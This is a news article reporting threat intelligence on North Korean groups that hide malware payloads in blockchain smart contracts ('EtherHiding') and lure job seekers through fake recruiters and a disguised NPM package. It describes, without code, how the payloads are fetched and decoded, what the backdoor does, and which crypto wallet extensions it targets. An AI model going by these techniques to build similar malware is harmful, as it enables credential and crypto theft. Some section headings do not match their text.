North Korea Weaponizes Blockchain For Stealth Hacks, Poses As Job Recruiters

What Happened

This discovery comes as North Korean hackers stole over $1.3 billion across 47 incidents in 2024 and $2.2 billion in the first half of 2025 alone, funding the regime’s weapons program through elaborate money laundering networks.

Victims download malicious files from GitHub repositories during technical assessments, triggering multi-stage infections.

These companies launched the “Contagious Interview” campaign, a Lazarus Group subgroup specializing in malware deployment.

Market Context

The group deployed a new JavaScript module that combines BeaverTail and OtterCookie malware, featuring keylogging and screenshot capabilities.

Why It Matters

North Korean threat group Famous Chollima is using blockchain technology to hide malware payloads in smart contracts, which marks the first documented case of a nation-state actor adopting “EtherHiding” techniques.

Cisco Talos and Google Threat Intelligence Group independently confirmed the attacks target job seekers through fake interview processes, deploying malware that steals crypto and credentials.

Details

The malicious software was distributed via a Node.js package named “node-nvm-ssh” on the official NPM repository, disguised as a chess application called “Chessfi.”

Google has documented a North Korean group, UNC5342, which has been embedding JADESNOW malware and INVISIBLEFERRET backdoors within smart contracts on the BNB Smart Chain and Ethereum since February 2025.

The technique stores malicious payloads on public blockchains, creating a decentralized command-and-control infrastructure that cannot be taken down by law enforcement.

EtherHiding Turns Blockchain Into Bulletproof Hosting Platform

EtherHiding embeds malicious JavaScript payloads within smart contracts on public blockchains, turning decentralized ledgers into resilient command-and-control servers.

Attackers retrieve payloads using read-only function calls that avoid transaction fees and leave no visible blockchain history.

The technique offers decentralized storage, prevents takedowns, pseudonymous transactions obscure attacker identity, and immutable smart contracts cannot be easily removed.

Attackers controlling contracts can update payloads at any time, changing attack methods or deploying different malware simultaneously.

Google Threat Intelligence documented UNC5342 using EtherHiding in the “Contagious Interview” campaign, where fake recruiters impersonate companies like Coinbase and Robinhood.

The JADESNOW downloader queries BNB Smart Chain through API providers like Binplorer to retrieve payloads from smart contract address 0x8ea**8a71c.

The contract has been updated over 20 times within four months, costing an average of $1.37 in gas fees per update.

Blockchain explorers show on-chain transactions containing Base64-encoded and XOR-encrypted messages that decrypt to heavily obfuscated JavaScript payloads.

The malware pivots between networks, querying Ethereum transaction history through multiple explorer APIs, including Blockchair, Blockcypher, and Ethplorer.

The final INVISIBLEFERRET.JAVASCRIPT payload connects to command-and-control servers via port 3306, sending victim hostname, username, operating system, and current directory.

The backdoor processes arbitrary command execution, file exfiltration, and directory harvesting while targeting over 80 browser extensions, including MetaMask and Phantom.

Fake Companies and Stolen Identities

Earlier this year, it was discovered that North Korean operatives established legitimate US corporations using fake identities to create credible corporate fronts.

Silent Push researchers discovered Blocknovas registered to a vacant lot in South Carolina, while Softglide traced back to a Buffalo tax office.